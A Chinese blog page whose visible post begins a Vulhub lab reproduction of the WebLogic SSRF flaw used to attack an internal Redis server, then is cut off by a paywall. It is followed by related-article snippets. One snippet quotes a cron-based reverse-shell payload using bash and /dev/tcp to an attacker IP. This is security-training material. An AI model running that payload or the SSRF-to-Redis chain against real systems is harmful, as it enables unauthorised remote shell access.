weblogic ssrf 攻击redis

最新推荐文章于 2024-07-07 17:51:51 发布

qaqCL

最新推荐文章于 2024-07-07 17:51:51 发布

阅读量148

点赞数

CC 4.0 BY-SA版权

文章标签： redis 数据库 web安全网络安全

本文链接：https://blog.youkuaiyun.com/qaqCL/article/details/132683902

Weblogic SSRF漏洞

一.环境搭建

app Weblogic path weblogic/ssrf

cd vulhub/weblogic/ssrf

docker-compose up -d

二.SSRF漏洞测试

1.SSRF漏洞存在于http://your-ip:7001/uddiexplorer/SearchPublicRegistries.jsp`

2.burp抓包，点击Search进行抓包

在这里插入图片描述

①访问端口不开放则会显示 not connect over

在这里插入图片描述

②访问指定开放端口则返回带有404内容的提示

在这里插入图片描述

3.判断redis服务器

①docker exec -it 23e908eaeb17 /bin/bash 进入容器查看 IP IP为172.21.0.2

docker

最低0.47元/天解锁文章

确定要放弃本次机会？

福利倒计时

: :

立减 ¥

普通VIP年卡可用

立即使用

qaqCL

关注关注

0
点赞
踩
2

收藏

觉得还不错? 一键收藏
1
评论
分享

复制链接

分享到 QQ

分享到新浪微博

扫一扫
举报

举报

WebLogic SSRF漏洞攻击内网Redis以及反弹shell

SoulCat

02-08

4045

WebLogic SSRF漏洞攻击内网Redis以及反弹shell 漏洞概述: -通俗的讲weblogci是一种web容器，首先判断redis(内网ip和端口)，由于Redis是通过换行符来分隔每条命令，可以通过传入%0a%0d来注入换行符，发送redis命令，将弹shell脚本写入/etc/crontab中(crontab是一个linux一个定时执行事件的一个程序)，然后getshell。基本...

深入解析SSRF和Redis未授权访问

最新发布

m0_66993332的博客

08-24

1250

etc/crontab 这个是肯定的/etc/cron.d/* 将任意文件写到该目录下，效果和crontab相同，格式也要和/etc/crontab相同。漏洞利用这个目录，可以做到不覆盖任何其他文件的情况进行弹shell。/var/spool/cron/root centos系统下root用户的cron文件/var/spool/cron/crontabs/root debian系统下root用户的cron文件SSRF和Redis未授权访问是两类常见但极具威胁的安全漏洞。

1 条评论您还未登录，请先登录后发表或查看评论

weblogic中ssrf漏洞修复_【漏洞复现】利用WebLogic SSRF漏洞攻击内网Redis反弹shell

weixin_39820226的博客

12-22

276

0x01 复现环境公网上存在WebLogic服务，存在SSRF漏洞内网中部署了一台Redis服务器，IP地址为172.21.0.2，端口6379反弹shell需要自己的公网IP总计两个公网IP，一个内网IP0x02 WebLogic SSRF漏洞WebLogic的SSRF漏洞算是一个比较知名的SSRF漏洞，具体原理可以自行谷歌。本篇主要是通过复现该漏洞来加深对SSRF漏洞的理解。首先访问WebLo...

Weblogic - SSRF攻击内网redis服务漏洞

HAKUNAMATATATTA的博客

12-05

1281

SSRF（Server-Side Request Forgery），服务端请求伪造，是一种由攻击者构造形成由服务端发起请求的一个漏洞，一般情况下，SSRF攻击的目标是从外部网络无法访问的内部系统。

利用Weblogic中间件存在的SSRF漏洞结合redis未授权访问漏洞GetShell

wenqingshuo321的博客

10-11

928

在Search Public Registries，选择Public Registry中的 IBM，同时勾选Search by business name，开启bp进行抓包，点击search。set 1 "\n\n\n\n * * * * * root bash -i >& /dev/tcp/{本地物理机ip}/1234 0>&1\n\n\n\n"给redis服务器发送三条命令，将其写入redis的容器里里面的/etc/crontab，从而将shell反弹到本地物理机ip的1234端口。

ssrf结合redis未授权getshell

07-07

1520

原理即为攻击者通过SSRF访问内网或本地的redis6379端口，如果刚好存在redis未授权，即可getshell

【weblogic ssrf漏洞复现】

m0_71635484的博客

03-20

393

【weblogic ssrf漏洞复现】

weblogic ssrf-redis 复现

SopRomeo的博客

12-07

599

复现环境 vulhub 感谢vulhub开源，非常方便复现漏洞漏洞存在点 http://127.0.0.1:7001/uddiexplorer/ burpsuit抓包发现url请求分别发送原来的包以及baidu.com的包发现报错信息返回不同不能连接80端口，这说明我们是可以访问的而weblogic是开放7001端口的，访问下7001端口试试发现回显了404no found，说明可以探测内网端口是否开放探测内网ip地址 docker环境的网段一般是172.* 根据回显不同，搜内网

SSRF——weblogic vulhub 漏洞复现及内网redis反弹shell

weixin_43774222的博客

03-17

6714

一、概述 SSRF（ Server-side Request Forgery ）服务端请求伪造。很多web应用都提供了从其他的服务器上获取数据的功能。使用用户指定的URL，web应用可以获取图片，下载文件，读取文件内容等。这个功能如果被恶意使用，可以利用存在缺陷的web应用作为代理攻击远程和本地的服务器。主要攻击手段 1.可以对外网、服务器所在内网、本地进行端口扫描，获取一些服务的banner信息; 2.攻击运行在内网或本地的应用程序（比如溢出）; 3.对内网web应用进行指纹识别，通过访问默认文件实现

WebLogic SSRF 及漏洞修复

11-25

WebLogic SSRF 及漏洞修复方法 CVE-2014-4210 10.0.2,10.3.6

linux weblogic ssrf漏洞,[技术]利用WebLogic SSRF漏洞攻击内网Redis反弹shell

weixin_39742392的博客

05-16

444

SSRF中Redis的利用

2301_80127209的博客

01-23

2059

SSRF(Server-Side Request Forgery,服务器请求伪造)是一种由攻击者构造请求,由服务端发起请求的安全漏洞,一般情况下,SSRF攻击的目标是外网无法访问的内网系统(因为请求是由服务端帮我们发起的，所以我们可以通过它来向其所在的内网机器发起请求)。Gopherus下载地址自己手动把攻击语句转换成Gopher协议的格式会很麻烦，这款工具里面内置了一些早就写好的利用语句，我们只需要学会如何使用它就可以很方便的写出一些我们需要的利用语句。

【SSRF-02】服务器端请求伪造攻击案例——WebLogic架构之从SSRF==＞Redis（存在未授权访问）==＞GetShell

m0_64378913的博客

07-04

1572

概述：Weblogic中存在一个SSRF漏洞，利用该漏洞可以发送任意HTTP请求，进而攻击内网中redis、fastcgi等脆弱组件。redis存在未授权访问漏洞（在访问redis数据库时，无需提供用户名及密码，且具备root权限读写文件）。影响范围：版本10.0.2、版本10.3.6。WebLogic是美国Oracle公司出品的一个application server，确切的说是一个基于JAVAEE架构的中间件，WebLogic是用于开发、集成、部署和管理大型分布式Web应用、网络应用和数据库应用的Jav

dedis&weblogic ssrf利用redis未授权反弹shell

Feng_Blue_的博客

10-27

487

本文仅提供于学术探讨，如有后果自行承担。 redis数据库未授权访问漏洞复现启用漏洞环境借助工具来进行操作查看基本帮助 weblogic ssrf利用redis未授权访问反弹shell

ssrf漏洞利用(内网探测、打redis)

Javachichi的博客

02-06

2920

声明该公众号大部分文章来自作者日常学习笔记，也有部分文章是经过作者授权和其他公众号白名单转载。请勿利用文章内的相关技术从事非法测试，如因此产生的一切不良后果与文章作者和本公众号无关。滑至文末,获取“searchall”下载链接!

weblogic从ssrf到redis获取shell

洋洋的小黑屋

03-16

770

一、环境搭建和知识储备 1.1、影响版本漏洞编号：CVE-2014-4210 weblogic 10.0.2.0 weblogic 10.3.6.0 1.2、Docker搭建环境 1.进入vulhub/fastjson，启动docker即可 cd /root/vulhub/weblogic/ssrf docker-compose up -d 2.查看启动的docker进程 docker ps ...

Weblogic-SSRF漏洞复现

黑锤的博客

08-14

4564

这两天了解的ssrf复现这个漏洞差不多了，开始进行笔迹整理：上面一篇介绍的就是些入门的基础，让你可以更加好的去理解，更好的懂ssrf这个漏洞的原理。 0x00 到底什么是ssrf呢？ SSRF(server-side request forgery ):服务器端请求伪造。是一种由攻击者构造形成由服务器端发起请求的一个安全漏洞，一般情况下，ssrf攻击的目标是从外网无法访问的内部系统（正是因...

welogic ssrf

08-28

Weblogic中存在一个SSRF漏洞（CVE-2014-4210），利用该漏洞可以发送任意HTTP请求，进而可以攻击内网中redis、fastcgi等脆弱组件。这个SSRF漏洞影响的版本是Weblogic 10.0.2和10.3.6。123 #### 引用[.reference_title] - *1* *2* *3* [web安全之weblogic漏洞总结](https://blog.youkuaiyun.com/qq_45625605/article/details/103469663)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v93^chatsearchT3_2"}}] [.reference_item style="max-width: 100%"] [ .reference_list ]